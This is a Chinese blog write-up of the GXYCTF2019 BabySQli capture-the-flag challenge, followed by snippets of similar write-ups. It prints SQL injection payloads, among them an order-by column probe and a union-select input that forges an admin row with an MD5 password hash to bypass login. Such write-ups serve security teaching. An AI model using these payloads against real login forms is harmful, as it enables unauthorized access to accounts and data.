GXYCTF2019]BabySQli

最新推荐文章于 2023-11-14 20:56:14 发布
最新推荐文章于 2023-11-14 20:56:14 发布
阅读量132 收藏
点赞数
分类专栏: # web之每日一题 buu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Shannidawang/article/details/119193598
版权

尝试登入 发现一个search.php
先base32解码 得到的结果进行base64解码
在这里插入图片描述

select * from user where username = '$name'

通过测试呢 可以猜测用户名为admin
测试字段数

1' order by 3#

只有三个字段
联合注入

1' union select 1,'admin',3

经测试 admin在第二列

当查询的数据不存在时,联合查询就会构造一个虚拟的数据
输入admin,密码为md5(123456),代入查询时MySQL里面就会生成admin,123456的用户
同时使用123456密码进行登录,就可以绕过限制

1' union select 1,'admin','e10adc3949ba59abbe56e057f20f883e'--+

password栏
123456

samh1777
关注
专栏目录
GXYCTF2019--BabySQli
Oavinci的博客
06-28 791
知识点: 查询数据不存在时,联合查询会构造一个虚拟的数据在数据库中。 随意输入点击登录,查看源代码得到一串字符串 base32+base64解码得到: select * from user where username = '$name' fuzz一下发现过滤了一些字符串。首先大写绕过"Order by 3#",查询列数为3,猜测为id,username,password。 这题考察的是用户名和密码分开检验,先将username对应的字段查出来后,再检验password和查出来的密码能不能
[GXYCTF2019]BabySQli 解题思路&过程
iamblackcat's blog
10-19 4899
[GXYCTF2019]BabySQli 解题思路&过程
[GXYCTF 2019]BabySqli
Aiwin的博客
08-10 1496
[GXYCTF 2019]BabySqli
GXYCTF2019 babysqli
weixin_45751765的博客
09-09 296
0x00 初试 一开始以为普通sql注入题 fuzz一下没过滤什么东西 or大小写直接绕过就行,但两个括号绕过之前倒没遇上过,尝试了各种编码好像也没用…
[GXYCTF2019]BabySQli
最新发布
weixin_74020633的博客
11-14 410
回显密码错误,说明admin在第二字段,但是要登录就需要密码,就用到前面提到的生成一个虚拟数据,这里账号知道,需要生成一个虚拟密码,前面提到是先判断用户名,所以密码应该在后一个字段,把密码进行md5加密,密码就为md5原值。这个语句说明在判断用户时,先判断用户名,按照经验,用户名一般先用admin试一下,发现用admin时,回显为密码错误,那么接下来就该到注入题的一般步骤了。通过模糊测试,发现order by,被过滤了,那么就要用联合注入来查询了,根据回显判断有3个字段。用万能密码登录看看,得到一串码。
[GXYCTF2019]BabySQli 1
10-06
[GXYCTF2019]BabySQli1 是一个联合查询构建虚拟数据的例子。该例子中使用了base32和base64进行数据模糊化处理。在第二个引用中,通过联合查询构建了一个查询语句,将用户名设置为'1'并且选择了一个管理员账号和密码...
[GXYCTF2019]BabySQli(联合注入添加临时虚拟用户)
weixin_44110537的博客
09-25 212
先模糊测试. 419长度的都是被过滤掉的. 但是幸运的是发现or在大写之后绕过了过滤. 于是猜测order也可以通过大写来绕过.(真的可以). 而union并没有被过滤.说明采用联合注入很有可能是可行的. 先通过 order by 来测有几列. 通过不断二分最终可以测出一共有3个字段. 在查询过程中如果数据库中没有对应的结果,会临时创建一个虚拟用户 举例: 这是查询前的表. 接着我们尝试查询一个不存在的数据. 可能这样还不够直观,通过联合查询将直观性体现出来.(联合查询时注意列数) 可以发现多了
[gxyctf2019]babysqli
03-16
"babysqli" 是一个 SQL 注入的题目,通常用于漏洞挖掘和安全测试目的。它通常包含一个网页表单,该表单将用户输入的数据插入到 SQL 查询中,如果网站没有正确地过滤和验证用户输入,那么攻击者可能能够通过注入恶意 ...
Buuctf web题 [GXYCTF2019]BabySQli WP
alatan9的博客
02-09 118
账号1' union select 1,'admin','e10adc3949ba59abbe56e057f20f883e'尝试后发现select 1,2,3 1是账号 3是密码 2不知道是啥。发现一串密码由于多数的大写字母怀疑是base32 解密。我们可以利用union select来创建一个临时账号。需要工具的可以私聊我 技术问题也可以私聊。解密后发现是base64 再次解密。发现到4报错 说明数据库只有三列。应该是sql注入先爆破出账号。发现过滤order 尝试绕过。发现账号是admin。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值